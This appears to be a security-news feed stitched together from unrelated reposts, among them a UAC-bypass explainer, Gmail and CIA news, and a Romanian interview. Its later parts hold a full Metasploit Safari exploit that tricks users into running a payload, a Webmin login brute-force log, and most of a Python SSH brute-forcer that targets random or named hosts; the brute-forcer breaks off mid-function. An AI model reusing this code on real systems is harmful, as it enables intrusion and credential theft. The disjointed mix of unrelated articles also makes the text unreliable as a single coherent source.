DerbyCon talk. They also released the exploit/windows/local/bypassuac Metasploit Framework module that uses Leo’s proof-of-concept for the heavy lifting. The bypass UAC attack requires that UAC is set to the default Notify me only when programs try to make changes to my computer. If UAC is set to Always Notify, this attack will not work. This attack also requires that our current user is in an administrators group. Bypass UAC: How It Works This is a fascinating attack whose inner workings are taken for granted. Please allow me the blog space to describe it in depth: Our story starts with COM, the Component Object Model in Windows. COM is a way of writing components that other programs may use and re-use. One of the benefits of COM is that it’s language neutral. I find it extremely complicated and unappealing to work with. I suspect others share my feelings. Some COM objects automatically elevate themselves to a high integrity context when run from a program signed with Microsoft’s code signing certificate. If the same COM object is instantiated from a program that was not signed by Microsoft, it runs with the same integrity as the current process. The COM distinction between Microsoft and non-Microsoft programs has little meaning though. I can’t create a COM object in a high integrity context because my programs are not signed with Microsoft’s certificate. I can spawn a Microsoft-signed program (e.g., notepad.exe) and inject a DLL into it though. From this DLL, I may instantiate a self-elevating COM object of my choice. When this COM object performs an action, it will do so from a high integrity context. Leo’s Bypass UAC attack creates an instance of the IFileOperation COM object. This object has methods to copy and delete files on the system. Run from a high integrity context, this object allows us to perform a privileged file copy to any location on the system. We’re not done yet! We need to go from a privileged file copy to code execution in a high integrity process. Before we can make this leap, I need to discuss another Windows 7 fun fact. Earlier, we went over the different UAC settings. The default UAC setting will not prompt the user when some built-in Windows programs try to elevate themselves. More practically, this means that some built-in Windows programs always run in a high integrity context. These programs that automatically elevate have a few properties. They are signed with Microsoft’s code signing certificate. They are located in a “secure” folder (e.g., c:\windows\system32). And, they request the right to autoElevate in their manifest. We can find which programs autoElevate themselves with a little strings magic: cd c:\windows\ strings –s *.exe | findstr /i autoelevate Now, we know which programs automatically run in a high integrity context AND we have the ability to perform an arbitrary copy on the file system. How do we get code execution? We get code execution through DLL search order hijacking. The public versions of the bypass UAC attack copy a CRYPTBASE.dll file to c:\windows\system32\sysprep and run c:\windows\system32\sysprep.exe. When sysprep.exe runs it will search for CRYPTBASE.dll and find the malicious one first. Because sysprep.exe automatically runs in a high integrity context (when UAC is set to default), the code in the attacker controlled CRYPTBASE.dll will execute in this high integrity context too. From there, we’re free to do whatever we like. We have our administrator privileges. Holy Forensic Artifacts Batman! I mentioned earlier that the Metasploit Framework’s bypassuac module uses Leo Davidson’s proof-of-concept. This module drops several files to disk. It uses Leo’s bypassuac-x86.exe (and bypassuac-x64.exe) to perform the privileged file copy from a medium integrity context. It also drops a CRYPTBASE.dll file to disk and the executable we want to run. This module, when run, also creates a tior.exe and several w7e_*.tmp files in the user’s temp folder. I have no idea what the purpose of these files are. When you use this module, you control the executable to run through the EXE::Custom option. The other artifacts are put on disk without obfuscation. For a long time, these other artifacts were caught by anti-virus products. A recent commit to the Metasploit Framework strips several debug and logging messages from these artifacts. This helps them get past the ire of anti-virus, for now. A better approach is to use a module that has as little on-disk footprint as possible. Fortunately, Metasploit contributor Ben Campbell (aka Meatballs) is here to save the day. A recent addition to the Metasploit Framework is the exploit/windows/local/bypassuac_inject module. This module compiles the UAC bypass logic into a reflective DLL. It spawns a Microsoft-signed program and injects the UAC bypass logic directly into it. The only thing that needs to touch disk is the CRYPTBASE.dll file. Bypass UAC on Windows 8 (and 8.1) In this post, I’ve focused heavily on Windows 7. Leo’s proof-of-concept and the bypassuac modules in the Metasploit Framework do not work on Windows 8. This is because the DLL hijacking opportunity against sysprep.exe does not work in Windows 8. The Bypass UAC attack is still possible though. A few releases ago, I added bypassuac to Cobalt Strike’s Beacon. I do not invest in short-term features, so I had to convince myself that this attack had a viable future. I audited all of the autoElevate programs on a stock Windows 8R1 to find another DLL hijacking opportunity. I had to find a program that would load my DLL before displaying anything to the user. There were quite a few false starts. In the end, I found my candidate. is similar to Ben Campbell’s, it performs all of the UAC bypass logic in memory. Beacon’s UAC bypass also generates an anti-virus safe DLL from Cobalt Strike’s Artifact Kit. Beacon’s UAC bypass checks the system it’s running on too. If it’s Windows 7, Beacon uses sysprep.exe to get code execution in a high integrity context. If it’s Windows 8, it uses another opportunity.If you’re having trouble with the alternatives, Beacon’s version of this attack is an option. Bypass UAC on Windows Vista The Bypass UAC attack does not work on Windows Vista. In Windows Vista, the user has to acknowledge every privileged action. This is the same as the Always Notify option in Windows 7 and later. The UAC settings in Windows 7 came about because UAC became a symbol of what was “wrong” with Windows Vista. Microsoft created UAC settings and made some of their built-in programs auto-elevate by default to prompt the user less often. These changes for user convenience created the loophole described in this post. Lateral Movement and UAC The concept of process integrity level only applies to the current system. When you interact with a network resource, your access token is all that matters. If your current user is a domain user and your domain user is a local administrator on another system, you can get past UAC. Here’s how this works: You may use your token to interact with another system as an administrator. This means you may copy an executable to that other system and schedule it to run. If you get access to another system this way, you may repeat the same process to regain access to your current system with full rights. You may use the Metasploit Framework’s exploit/windows/local/current_user_psexec to do this. Summary These UAC bypass attacks are among my favorite hacker techniques. They’re a favorite because they take advantage of a design loophole rather than a fixed-with-the-next-update memory corruption flaw. In theory, we will have these attacks for a long time. Source

Your email is important to you, and making sure it stays safe and always available is important to us. As you go about your day reading, writing, and checking messages, there are tons of security measures running behind the scenes to keep your email safe, secure, and there whenever you need it. Starting today, Gmail will always use an encrypted HTTPS connection when you check or send email. Gmailhas supported HTTPS since the day it launched, and in 2010 we made HTTPS the default. Today's change means that no one can listen in on your messages as they go back and forth between you and Gmail’s servers—no matter if you're using public WiFi or logging in from your computer, phone or tablet. In addition, every single email message you send or receive—100% of them—is encrypted while moving internally. This ensures that your messages are safe not only when they move between you and Gmail's servers, but also as they move between Google's data centers—something we made a top priority after last summer’s revelations. Of course, being able to access your email is just as important as keeping it safe and secure. In 2013, Gmail was available 99.978% of the time, which averages to less than two hours of disruption for a user for the entire year. Our engineering experts look after Google's services 24x7 and if a problem ever arises, they're on the case immediately. We keep you informed by posting updates on the Apps Status Dashboard until the issue is fixed, and we always conduct a full analysis on the problem to prevent it from happening again. Our commitment to the security and reliability of your email is absolute, and we’re constantly working on ways to improve. You can learn about additional ways to keep yourself safe online, like creating strong passwordsand enabling 2-step verification, by visiting the Security Center: https://www.google.com/help/security. Source

EnjoyCSS is an advanced CSS3 generator that saves your time. Its handy and simple UI allows you to adjust rich graphical styles quickly and without coding. Online CSS3 Code Generator With a Simple Graphical Interface - EnjoyCSS

Don't click that link! Viral Facebook posts with shocking video of Malaysia Airlines MH370 are a scam. (Credit: Screenshot by Eric Mack/CNET) Don't click on any link that says it has shocking video of Malaysia Airlines Flight MH370. According to multiple reports, links promising resolution for the missing Flight MH370 are scams. Videos with titles like "Malaysian Airlines missing flight MH370 found in Sea -- 50 people alive saved" have spread through social media sites like Facebook and Twitter, Wired U.K reports. Malware intelligence analyst at Malwarebytes Chris Boyd told Wired that links being spread through Twitter originally appeared on Facebook. The blog Hoax-Slayer.com warned of a fake news link claiming that the Malaysian plane has been found in the Bermuda Triangle. According to blogger Brett M. Christensen, the photos used to promote the video is from an April 2013 Lion Air plane crash near Bali. Facebook users lured by shocking videos typically find that they must complete a survey before continuing. Christensen says the links are designed to look like a Facebook survey, requesting permission to gain access to your profile. Giving permission to your profile could give hackers personal information, like phone numbers and e-mail addresses. Scam artists seek a payday from affiliate marketing schemes that pay money when a user participates in a survey. A spokesperson for Facebook told CBS News that the company has removed the links. Phishing and spam are a violation of the social network's community standards. Via Fake Malaysia Airlines links spread malware | Security & Privacy - CNET News

Tutorial on How to Crack Zip files using Fcrackzip Source: 101hacker.com

Authors: Jonny Milliken Valerio Selis Alan Marshall This paper analyses and proposes a novel detection strategy for the ‘Chameleon’ WiFi AP-AP virus. Previous research has considered virus construction, likely virus behaviour and propagation methods. The research here describes development of an objective measure of virus success, the impact of product susceptibility, the acceleration of infection and the growth of the physical area covered by the virus. An important conclusion of this investigation is that the connectivity between devices in the victim population is a more significant influence on virus propagation than any other factor. The work then proposes and experimentally verifies the application of a detection method for the virus. This method utilises layer 2 management frame information which can detect the attack while maintaining user privacy and user confidentiality, a key requirement in many security solutions. Download: http://jis.eurasipjournals.com/content/pdf/1687-417X-2013-2.pdf

Colin and I were working on an memory image the other day and needed to find DLLs loaded by svchost.exe. We turned to everyone's default memory analysis tool Volatility. Volatility doesn't really give you a good option to search for loaded dlls by process name. You can specify a pid to do this, but when you have many processes that have the same name (ie svchost.exe) you can end up with a nasty command like this to do the trick. This really wasn't working for us so we took a look at Volatility's source code and made some small adjustments. We modified the taskmods.py module that ultimately affects the dlllist module. Normally if you select dlllist plugin with the -h option it gives you various options you can use such as an offset or a pid as seen below: With our modified taskmods.py you have a new option for adding a process by name or a list of processes by name as seen below: Now we can simply give it the svchost.exe process by name and get a list of loaded DLL's by processes running by that name. If you have a non-standard svchost.exe process running then this will pick it up as well, but that situation might also help identify a compromise So executing volatility with the following command vol.py -f 7re-912d4ad7.vmem --profile Win7SP1x64 dlllist -n svchost.exe now gives an output of: I am sure there are better ways at getting the same information, but this worked rather well for us and we thought we would share. You can get the module at our github repository. To install it just replace the taskmods.py from your $VOLATILITYHOME/volatility/plugins directory with our taskmods.py. We have tested it on volatility 2.2, 2.3, 2.3.1 on XP and Windows 7 with no problems. Source

So i ran across a bunch of webmin boxes on a pentest. I went to just go try http_login or some other spiffy Metasploit auxiliary module but nothing was working quite right. I ended up needing to write my own because i had about 60+ hosts to check and that just tedious enough to make you write code and not manually do it. At least one gotcha i discovered is that webmin will block the IP after four or five (usually 5) attempts. I believe the default is 300 seconds it will also supposedly increase the delay if the same host keeps hitting it. I took the approach to throw 5 passwords at it, if its not something super obvious then i'd move along. maybe not the best solution but i wanted to make sure it wasn't root/root or webmin/webmin and move on. msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 smsf auxiliary(webmin_login_brute) > set RPORT 10000 RPORT => 10000 smsf auxiliary(webmin_login_brute) > set SSL TRUE SSL => TRUE msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false BLANK_PASSWORDS => false setmsf auxiliary(webmin_login_brute) > set USER_AS_PASS false USER_AS_PASS => false set msf auxiliary(webmin_login_brute) > set USERNAME root USERNAME => root msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt msf auxiliary(webmin_login_brute) > run [*] Verifying login exists at http://192.168.1.1:10000/session_login.cgi [*] http://192.168.1.1:10000/session_login.cgi - Webmin - Attempting authentication [*] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'' [-] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'' [*] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root' [-] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root' [*] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin' [-] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin' [*] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password' [-] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password' [*] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein' [-] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked [*] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1' [-] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked [*] Scanned 1 of 1 hosts (100% complete) and looks like this when it works [*] Verifying login exists at http://10.0.0.25:12321/session_login.cgi [*] http://10.0.0.25:12321/session_login.cgi - Webmin - Attempting authentication [*] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'' [-] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'' [*] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root' [-] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root' [*] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin' [-] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin' [*] 10.0.0.25:12321 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password' [+] http://10.0.0.25:12321/session_login.cgi - Webmin - Login Successful 302 with 'root':'password' Redirect to->https://10.0.0.25:12321/ [*] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein' [-] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'letmein' [*] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1' [-] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password1' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ** note you have to unset the PASSWORD value too, for some reason its populating with a blank password and trying that which sucks if you only have five chances. Code is here https://github.com/carnal0wnage/metasploit-framework/blob/webminmodule/modules/auxiliary/scanner/http/webmin_login.rb figured i'd let the blog serve as way to let people test prior to doing a pull request. Source

Sir Tim Berners-Lee. World Wide Web-ul implineste in data de 12 martie 2014 frumoasa varsta de 25 de primaveri. Nimeni nu este mai indreptatit sa discute despre evolutia WWW decat inventatorul protocoalelor web-ului, Sir Tim Berners-Lee. Intr-un interviu acordat cu ocazia SXSW, Sir Tim a discutat despre originea ideii de WWW si ce l-a inspirat sa inventeze spatiul virtual. Dupa cum subliniaza Berners-Lee, multi oameni au fost reticenti cu privire la WWW, la inceputuri. Chiar daca internetul exista si in urma cu 25 de ani, oamenii erau obisnuiti cu asimilarea traditionala a informatiei. La inceput, nu au vazut avantajul expunerii datelor lor in fata lumii intregi. De ce a transformat Berners-Lee introducerea adreselor URL intr-o joaca? El explica sensul "http://" si cum a influentat protocolul anii ce au urmat. La varsta de 25 de ani, Web-ul este un tanar, spune Berners-Lee. Este independent, traieste pe cont propriu. Are drepturi, dar si responsabilitati. Berners-Lee considera ca web-ul ar trebui sa reflecte cu acuratete drepturile si responsabilitatile ce revin celor care il utilizeaza. "Exista drepturi care trebuie scoase in evidenta", precizeaza Berners-Lee. Web-ul poate fi un instrument al libertatii, dar si al represiunii. "Unele tari folosesc internetul pentru a-i imobiliza pe cetateni, pentru a-i spiona", spune Berners-Lee. El subliniaza ca controlul corporatist al web-ului sau monopolul asupra legilor ce stau la baza functionarii www afecteaza in mare parte spatiul WWW. Legislatia sponsorizata de corporatisti, care impiedica buna circulatie e informatiei, va continua sa ne afecteze, estimeaza inventatorul Web-ului. Berners-Lee spune ca in urma cu 25 de ani nu ar fi banuit ca web-ul va avea un asemenea impact asupra mediului de afaceri si societatii. Ar vrea ca tehnicienii sa-si foloseasca mai des inteligenta sociala, pentru a construi site-uri folosite in cadrul interactiunii dintre popoare, culturi, pentru a combate xenofobia si ignoranta. Cel mai mult, Berners-Lee detesta ascensiunea emailurilor spam. "Reprezinta o irosire a resurselor internetului si a timpului nostru", spune el. Privind spre viitor, Berners-Lee este incantat ca s-a trecut de la paginile web statice la cele care pot fi programate "ca si un computer". "Este o schimbare extraordinara", spune Berners-Lee. "Discutam despre comunicarea in timp real intre paginile web si o noua modalitate de < >". In urmatorii 25 de ani, Berners-Lee ar vrea sa vada cum oamenii detin controlul asupra locului in care isi stocheaza datele. De asemenea, vrea sa se asigure ca infrastructura de baza ramane gratuita si sustine, fara echivoc, drepturile omului. Via Yahoo! News

NSA cheerleader's concern is hypocritical, says Snowden US Senator Dianne Feinstein (D-CA) has issued a rare public rebuke to the CIA after the agency hacked into a Senate committee's computers to remove documents describing agents' torture enhanced interrogation of terrorist suspects. "I have asked for an apology and a recognition that this CIA search of computers used by its oversight committee was inappropriate. I have received neither," she said. "Besides the constitutional implications, the CIA’s search may also have violated the Fourth Amendment, the Computer Fraud and Abuse Act, as well as Executive Order 12333, which prohibits the CIA from conducting domestic searches or surveillance." Feinstein is head of the Senate Intelligence Committee, which is supposed to scrutinize America's intelligence agencies, and has been a strong supporter of the NSA – even sponsoring a bill to codify into law the mass surveillance techniques used by that agency. But it seems when such intrusion happens to her, it's a different matter. Back in 2006, her committee started looking into the CIA's rendition and interrogation program that began in 2002. At some point, agents destroyed video tapes of the interrogation of terrorist suspects, but the then-head of the CIA said this wasn't a problem, since agency documents would give "a more than adequate representation" of what went on. Then in 2009, the agency handed over 6.2 million unsorted documents to the committee's investigators to study. For security reasons, these were held on an air-gapped network in a secure facility, and Senate staffers began the process of going through them, but the amount of data was so immense they asked the CIA for a search tool to go through them. This was provided, and it was used to find a number of interesting reports from an internal CIA review that showed "significant CIA wrongdoing," Feinstein said. But then some of the documents started to disappear form the network. Who rm -rf'd the damning dossier? In early 2010 Senate staffers found 870 pages of documents were removed from the database, with another 50 taken out in May. When questioned, the CIA said the documents must have been deleted by IT contractors running the system, then claimed the White House had insisted they be removed, before admitting removing the documents and apologizing to the committee. The committee's report of the CIA's detention and interrogation program was finished last year, and was sent to the White House and the CIA for review. The report used the internal CIA review documents after redacting sensitive information such as the names of CIA staff involved in the program. Then on January 15 Feinstein said CIA director John Brennan called an emergency meeting and told her that his agents had rifled through the computers of congressional staff for documents relating to its internal review of the interrogations. Meanwhile stories were leaked to the press claiming that staffers had hacked CIA computers to get the incriminating documents. Feinstein denied this latter claim, pointing out the documents used were those provided by the CIA itself. She vowed to press on and publish the full report as soon as possible, and called the CIA's actions "a defining moment for the oversight of our Intelligence Community." In an interview on Tuesday the CIA director denied that his agency had done anything wrong. "We weren't trying to block anything," Brennan said. "The matter is being dealt with in an appropriate way, being look at by the right authorities, and the facts will come out. Let me assure you the CIA was in no way spying on [the committee] or the Senate." Given Feinstein's record, or rather lack of one, in protecting members of the general public from government surveillance, her outraged statement drew wry comment from NSA whistleblower Edward Snowden. "It's clear the CIA was trying to play 'keep away' with documents relevant to an investigation by their overseers in Congress, and that's a serious constitutional concern," he said in a statement to NBC News. "But it's equally if not more concerning that we're seeing another 'Merkel Effect,' where an elected official does not care at all that the rights of millions of ordinary citizens are violated by our spies, but suddenly it's a scandal when a politician finds out the same thing happens to them." ® Via CIA hacked Senate PCs to delete torture reports. And Senator Feinstein is outraged • The Register

Hackers have hijacked more than 162,000 legitimate WordPress sites, connecting them to a criminal botnet and forcing them to mount distributed denial-of-service (DDoS) attacks, according to security firm Sucuri. Sucuri CTO Daniel Cid said the company uncovered the botnet when analysing an attack targeting one of its customers. Cid said Sucuri managed to trace the source of the attack to legitimate WordPress sites. "The most interesting part is that all the requests were coming from valid and legitimate WordPress sites. Yes, other WordPress sites were sending random requests at a very large scale and bringing the site down," read the blog. "Just in the course of a few hours, over 162,000 different and legitimate WordPress sites tried to attack his site. We would likely have detected a lot more sites, but we decided we had seen enough and blocked the requests at the edge firewall, mostly to avoid filling the logs with junk." Cid said the attackers successfully mounted the scam using a well-known flaw in WordPress code. "One attacker can use thousands of popular and clean WordPress sites to perform their DDoS attack, while being hidden in the shadows, and that all happens with a simple ping-back request to the XML-RPC file," read the post. "This is a well-known issue within WordPress and the core team is aware of it, it's not something that will be patched, though. In many cases this same issue is categorised as a feature, one that many plugins use, so in there lies the dilemma." At the time of publishing, WordPress had not responded to V3's request for comment on the Sucuri blog post. Cid said WordPress users concerned they may be affected should disable the dodgy XML-RPC functionality of their site or download an automated scanner tool from a legitimate security service provider. Gary Sockrider, solutions architect at DDoS mitigation firm Arbor Networks, told V3 that attacks targeting WordPress users are increasing as the site's lax security makes it easy for hackers. “It’s not uncommon that cyber criminals use PHP web application servers as bots in the attacks. Many WordPress sites, often using the out-of-date TimThumb plugin, were compromised in the past – the same happened to Joomla and other PHP-based applications,” he said. “Attackers usually target unmaintained servers to which the attackers upload PHP web shells and then use those shells to further deploy attack tools. Attackers connect to the tools either directly or through intermediate servers, proxies or scripts.” DDoS attacks are a growing problem facing governments and businesses. They are a popular tactic with hacktivist groups looking to knock websites and systems offline by flooding them with requests. In 2014 the tactic has been used against numerous high-profile agencies and companies, including the UK Ministry of Justice. Via Hackers turn 162,000 WordPress sites into DDoS attack tools - IT News from V3.co.uk

This Metasploit module abuses some Safari functionality to force the download of a zipped .app OSX application containing our payload. The app is then invoked using a custom URL scheme. At this point, the user is presented with Gatekeeper's prompt: "APP_NAME" is an application downloaded from the internet. Are you sure you want to open it? If the user clicks "Open", the app and its payload are executed. If the user has the "Only allow applications downloaded from Mac App Store and identified developers (on by default on OS 10.8+), the user will see an error dialog containing "can't be opened because it is from an unidentified developer." To work around this issue, you will need to manually build and sign an OSX app containing your payload with a custom URL handler called "openurl". You can put newlines and unicode in your APP_NAME, although you must be careful not to create a prompt that is too tall, or the user will not be able to click the buttons, and will have to either logout or kill the CoreServicesUIAgent process. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserExploitServer # Note: might be nicer to do this with mounted FTP share, since we can # unmount after the attack and not leave a trace on user's machine. def initialize(info = {}) super(update_info(info, 'Name' => 'Safari User-Assisted Download & Run Attack', 'Description' => %q{ This module abuses some Safari functionality to force the download of a zipped .app OSX application containing our payload. The app is then invoked using a custom URL scheme. At this point, the user is presented with Gatekeeper's prompt: "APP_NAME" is an application downloaded from the internet. Are you sure you want to open it? If the user clicks "Open", the app and its payload are executed. If the user has the "Only allow applications downloaded from Mac App Store and identified developers (on by default on OS 10.8+), the user will see an error dialog containing "can't be opened because it is from an unidentified developer." To work around this issue, you will need to manually build and sign an OSX app containing your payload with a custom URL handler called "openurl". You can put newlines & unicode in your APP_NAME, although you must be careful not to create a prompt that is too tall, or the user will not be able to click the buttons, and will have to either logout or kill the CoreServicesUIAgent process. }, 'License' => MSF_LICENSE, 'Targets' => [ [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x64 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X64, } ] ], 'DefaultTarget' => 0, 'Author' => [ 'joev' ], 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::SAFARI, :os_name => OperatingSystems::MAC_OSX, # On 10.6.8 (Safari 5.x), a dialog never appears unless the user # has already manually launched the dropped exe :ua_ver => lambda { |ver| ver.to_i != 5 } } )) register_options([ OptString.new('APP_NAME', [false, "The name of the app to display", "Software Update"]), OptInt.new('DELAY', [false, "Number of milliseconds to wait before trying to open", 2500]), OptBool.new('LOOP', [false, "Continually display prompt until app is run", true]), OptInt.new('LOOP_DELAY', [false, "Time to wait before trying to launch again", 3000]), OptBool.new('CONFUSE', [false, "Pops up a million Terminal prompts to confuse the user", false]), OptString.new('CONTENT', [false, "Content to display in browser", "Redirecting, please wait..."]), OptPath.new('SIGNED_APP', [false, "A signed .app to drop, to workaround OS 10.8+ settings"]) ], self.class) end def on_request_exploit(cli, request, profile) if request.uri =~ /\.zip/ print_status("Sending .zip containing app.") seed = request.qstring['seed'].to_i send_response(cli, app_zip(seed), { 'Content-Type' => 'application/zip' }) else # send initial HTML page print_status("Sending #{self.name}") send_response_html(cli, generate_html) end handler(cli) end def generate_html %Q| <html><body> #{datastore['CONTENT']} <iframe id='f' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'> </iframe> <iframe id='f2' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'> </iframe> <script> (function() { var r = parseInt(Math.random() * 9999999); if (#{datastore['SIGNED_APP'].present?}) r = ''; var f = document.getElementById('f'); var f2 = document.getElementById('f2'); f.src = "#{get_module_resource}/#{datastore['APP_NAME']}.zip?seed="+r; window.setTimeout(function(){ var go = function() { f.src = "openurl"+r+"://a"; }; go(); if (#{datastore['LOOP']}) { window.setInterval(go, #{datastore['LOOP_DELAY']}); }; }, #{datastore['DELAY']}); if (#{datastore['CONFUSE']}) { var w = 0; var ivl = window.setInterval(function(){ f2.src = 'ssh://ssh@ssh'; if (w++ > 200) clearInterval(ivl); }, #{datastore['LOOP_DELAY']}); } })(); </script> </body></html> | end def app_zip(seed) if datastore['SIGNED_APP'].present? print_status "Zipping custom app bundle..." zip = Rex::Zip::Archive.new zip.add_r(datastore['SIGNED_APP']) zip.pack else plist_extra = %Q| <key>CFBundleURLTypes</key> <array> <dict> <key>CFBundleURLName</key> <string>Local File</string> <key>CFBundleURLSchemes</key> <array> <string>openurl#{seed}</string> </array> </dict> </array> | my_payload = generate_payload_exe(:platform => [Msf::Module::Platform::OSX]) Msf::Util::EXE.to_osx_app(my_payload, :app_name => datastore['APP_NAME'], :plist_extra => plist_extra ) end end end Safari User-Assisted Download / Run Attack ? Packet Storm

UPDATE v0.2 # CHANGELOG # v0.2 # - prints kernel version after login # - optimized timings when cracking # - detection for key authentication # - false positive / small honeypot detection # - save found target ip addresses to file, -O option # - 127.x.x.x will be excluded when scanning for random ip addresses # - unsort found target ip addresses, because of sequential port scanning # - resolve ip address by given hostname # - stop attacks on target when keyboard-interactive is required # - set threads for port scanning, -s option usage: ./against.py -i <arg> | -r <arg> | -I <arg> options: -i <ip/range> ip address/ip range/domain (e.g.: 192.168.0-3.1-254) -I <file> list of targets -r <num> attack random hosts -p <num> port number of sshd (default: 22) -t <num> threads per host (default: 4) -f <num> attack max hosts parallel (default: 8) -u <username> single username (default: root) -U <file> list of usernames -l <password> single password (default: toor) -L <file> list of passwords -o <file> write found logins to file -O <file> write found target ip addresses to file -s <num> threads when port scanning (default: 200) -T <sec> timeout in seconds (default: 3) -V print version of against.py and exit examples: attack single target usage: ./against.py -i nsa.gov -L passwords.txt scanning and attacking an ip-range usage: ./against.py -i 192.168.0-10.1-254 -u admin -l troll -s 500 #!/usr/bin/env python # -*- coding: latin-1 -*- from socket import * import multiprocessing import threading import time import paramiko import sys import os import logging import argparse import random import re # version of against.py VERSION = 'v0.2' # print our nice banner def banner(): print '--==[ against.py by pgt@nullsecurity.net ]==--' # print version def version(): print '[+] against.py %s' % (VERSION) sys.exit(0) # check if we can write to file def test_file(filename): try: outfile = open(filename, 'a') outfile.close() except IOError: print '[!] ERROR: cannot write to file \'%s\'' % filename sys.exit(1) # define command line parameters and help page def argspage(): parser = argparse.ArgumentParser( usage = '\n\n ./%(prog)s -i <arg> | -r <arg> | -I <arg>', formatter_class = argparse.RawDescriptionHelpFormatter, epilog = 'examples:\n\n' ' attack single target\n' ' usage: ./%(prog)s -i nsa.gov -L passwords.txt\n\n' ' scanning and attacking an ip-range\n' ' usage: ./%(prog)s -i 192.168.0-10.1-254 -u admin -l troll -s 500', add_help = False ) options = parser.add_argument_group('options', '') options.add_argument('-i', default=False, metavar='<ip/range>', help='ip address/ip range/domain (e.g.: 192.168.0-3.1-254)') options.add_argument('-I', default=False, metavar='<file>', help='list of targets') options.add_argument('-r', default=False, metavar='<num>', help='attack random hosts') options.add_argument('-p', default=22, metavar='<num>', help='port number of sshd (default: 22)') options.add_argument('-t', default=4, metavar='<num>', help='threads per host (default: 4)') options.add_argument('-f', default=8, metavar='<num>', help='attack max hosts parallel (default: 8)') options.add_argument('-u', default='root', metavar='<username>', help='single username (default: root)') options.add_argument('-U', default=False, metavar='<file>', help='list of usernames') options.add_argument('-l', default='toor', metavar='<password>', help='single password (default: toor)') options.add_argument('-L', default=False, metavar='<file>', help='list of passwords') options.add_argument('-o', default=False, metavar='<file>', help='write found logins to file') options.add_argument('-O', default=False, metavar='<file>', help='write found target ip addresses to file') options.add_argument('-s', default=200, metavar='<num>', help='threads when port scanning (default: 200)') options.add_argument('-T', default=3, metavar='<sec>', help='timeout in seconds (default: 3)') options.add_argument('-V', action='store_true', help='print version of against.py and exit') args = parser.parse_args() if args.V: version() if (args.i == False) and (args.I == False) and (args.r == False): print '' parser.print_help() sys.exit(0) return args # write found ip addresses / logins to file def write_to_file(filename, text): outfile = open(filename, 'a') outfile.write(text) outfile.close() # connect to target and checks for an open port def scan(target, port, timeout, oips): sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(timeout) result = sock.connect_ex((target, port)) sock.close() if result == 0: HOSTLIST.append(target) if oips: write_to_file(oips, target + '\n') # control the maximum number of threads def active_threads(threads, waittime): while threading.activeCount() > threads: time.sleep(waittime) # create thread and call scan() def thread_scan(args, target): port = int(args.p) timeout = float(args.T) oips = args.O threads = int(args.s) bam = threading.Thread(target=scan, args=(target, port, timeout, oips)) bam.start() active_threads(threads, 0.0001) time.sleep(0.001) # only the output when scanning for targets def scan_output(i): sys.stdout.flush() sys.stdout.write('\r[*] hosts scanned: {0} | ' \ 'possible to attack: {1}'.format(i, len(HOSTLIST))) # handle format of given target(s) def check_targets(targets): if re.match(r'^[0-9.\-]*$', targets): return targets try: target = gethostbyname(targets) return target except gaierror: print '[-] \'%s\' is unreachable' % (targets) finished() sys.exit(1) # unsort found hosts, because of incremental scanning def unsort_hostlist(): print '[*] unsort host list' for i in range(15): random.shuffle(HOSTLIST) # handle ip range format from command line def handle_ip_range(iprange): parted = tuple(part for part in iprange.split('.')) rsa = range(4) rsb = range(4) for i in range(4): 